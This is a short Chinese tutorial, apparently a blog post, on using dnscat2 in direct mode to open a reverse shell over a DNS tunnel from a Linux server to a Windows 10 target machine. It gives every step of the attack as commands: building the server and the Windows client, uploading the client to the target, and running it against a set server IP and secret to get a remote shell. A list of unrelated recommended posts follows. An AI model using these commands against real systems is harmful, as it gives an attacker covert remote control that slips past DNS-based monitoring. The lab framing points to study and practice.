使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
耶啵奶膘1 小时前
uniapp-是否删除
linux·前端·uni-app
_.Switch2 小时前
高级Python自动化运维:容器安全与网络策略的深度解析
运维·网络·python·安全·自动化·devops
2401_850410832 小时前
文件系统和日志管理
linux·运维·服务器
JokerSZ.2 小时前
【基于LSM的ELF文件安全模块设计】参考
运维·网络·安全
XMYX-03 小时前
使用 SSH 蜜罐提升安全性和记录攻击活动
linux·ssh
芯盾时代3 小时前
数字身份发展趋势前瞻:身份韧性与安全
运维·安全·网络安全·密码学·信息与通信
心灵彼岸-诗和远方4 小时前
DevOps业务价值流:架构设计最佳实践
运维·产品经理·devops
一只哒布刘4 小时前
NFS服务器
运维·服务器
弗锐土豆5 小时前
Windows系统中Oracle VM VirtualBox的安装
windows·虚拟机·virtualbox